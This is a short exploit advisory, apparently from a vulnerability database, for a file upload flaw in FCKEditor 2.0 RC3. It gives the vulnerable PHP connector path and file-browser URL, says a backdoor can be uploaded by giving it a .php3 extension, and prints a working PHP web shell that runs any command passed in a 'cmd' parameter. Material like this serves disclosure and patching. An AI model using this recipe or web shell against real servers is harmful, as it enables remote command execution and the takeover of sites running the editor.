FCKEditor 2.0 RC3 shell upload vulnerability

2010.03.17
Credit: Aodrulez.
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

FCKEditor Shell Upload Exploit ------------------------------ Web-App: FCKEditor. Version: Version 2.0 RC3 (Release Candidate 3). Link : http://sourceforge.net/projects/fckeditor/files/FCKeditor/ Author : Aodrulez. Email : f3arm3d3ar@gmail.com Vulnerable File : ----------------- http://127.0.0.1/editor/filemanager/browser/default/connectors/php/connector.php Vulnerable Link : ----------------- http://127.0.0.1/editor/filemanager/browser/default/browser.html?Connector=/editor/filemanager/browser/default/connectors/php/connector.php Exploit : --------- You can upload a php backdoor with this extension: .php3 Sample Backdoor:(save as "any_name.php3") ----------------------------------------- <? system($_GET["cmd"]); ?> Greetz Fly Out To : ------------------- Amforked() : My Mentor. The Blue Genius : My Boss. str0ke : Tnx a Ton 4 everythin! www.orchidseven.com www.isac.org.in


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top